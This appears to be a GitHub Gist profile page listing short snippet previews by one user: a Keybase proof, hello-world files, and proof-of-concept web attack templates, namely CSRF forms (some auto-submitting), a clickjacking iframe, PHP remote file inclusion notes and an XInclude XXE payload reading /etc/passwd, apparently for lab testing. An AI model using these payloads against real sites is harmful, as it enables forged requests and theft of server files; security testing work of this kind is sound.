Skip to content

Instantly share code, notes, and snippets.

View jakekarnes42's full-sized avatar

Jake Karnes jakekarnes42

21 followers · 0 following
View GitHub Profile
@jakekarnes42
jakekarnes42 / keybase.md
Created November 30, 2016 00:18

Keybase proof

I hereby claim:

  • I am jakekarnes42 on github.
  • I am jakekarnes (https://keybase.io/jakekarnes) on keybase.
  • I have a public key ASCRTEY9DgdyMbIG7PHshYfpHvzbpTh_iv5IFqJtrGxZPQo

To claim this, I am signing this object:

@jakekarnes42
jakekarnes42 / csrf_json_simple.html
Created August 7, 2019 23:07
CSRF PoC HTML for POSTing JSON values
<!--
PoC only. Useful for CSRF involving JSON values. Must actually click button to submit.
Submits a request that looks like the following:
POST /oneliner/ws/vulnerable/oneliners HTTP/1.1
Host: local.1-liner.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
@jakekarnes42
jakekarnes42 / clickjack_template.html
Last active November 1, 2019 21:04
PoC to show a site could be embedded in an iFrame
<!-- Replace the iFrame source with victim URL-->
<html>
<style>
iframe {
width:1000px;
height:500px;
top:0; left:0;
border: 10px solid black;
}
</style>
@jakekarnes42
jakekarnes42 / csrf_json_hidden.html
Created August 7, 2019 23:19
CSRF PoC Example that can be reused. Automatically POSTs a JSON string to a server after a short delay.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout("$('#target').submit()", 3000);
});</script>
</head>
<body>
@jakekarnes42
jakekarnes42 / csrf_simple_post.html
Created August 11, 2019 18:27
Simple template for POST-based CSRF
<html>
<body>
<!–– Change URL and params below-->
<form method="POST" action="http://owaspbwa/ghost/blogView.php">
<input type="hidden" name="vuln" value="me so dumb"/>
<input type="hidden" name="user" value="admin"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
@jakekarnes42
jakekarnes42 / simple_csrf_automatic.html
Created August 11, 2019 18:32
Simple CSRF template that submits a hidden form automatically
<html>
<head>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script type="text/javascript">$(document).ready(function (){
setTimeout("$('#target').submit()", 3000);
});</script>
</head>
<body>
<h1>Loading...</h1>
<!–– Change URL and params below-->
@jakekarnes42
jakekarnes42 / hello_world.html
Last active November 12, 2019 19:43
Hello World HTML
<html>
<head></head>
<body>
<h1>Hello world!</h1>
</body>
<html>
@jakekarnes42
jakekarnes42 / hello_world.php
Created August 11, 2019 18:42
Simple PHP hello world
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php echo '<p>Hello World</p>'; ?>
</body>
</html>
@jakekarnes42
jakekarnes42 / php_rfi_example_notes.txt
Created August 12, 2019 22:34
Example for testing PHP RFI
$ mkdir evil_files
$ cat > evil_files/phpinfo.txt
<?php
phpinfo();
?>
Next, we need to serve the file. Python has a built in web server module we can use for this.
$ cd evil_files
$ python -m SimpleHTTPServer
@jakekarnes42
jakekarnes42 / xinclude_example.xml
Created August 13, 2019 23:37
Simple example of using XInclude in XXE attack
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>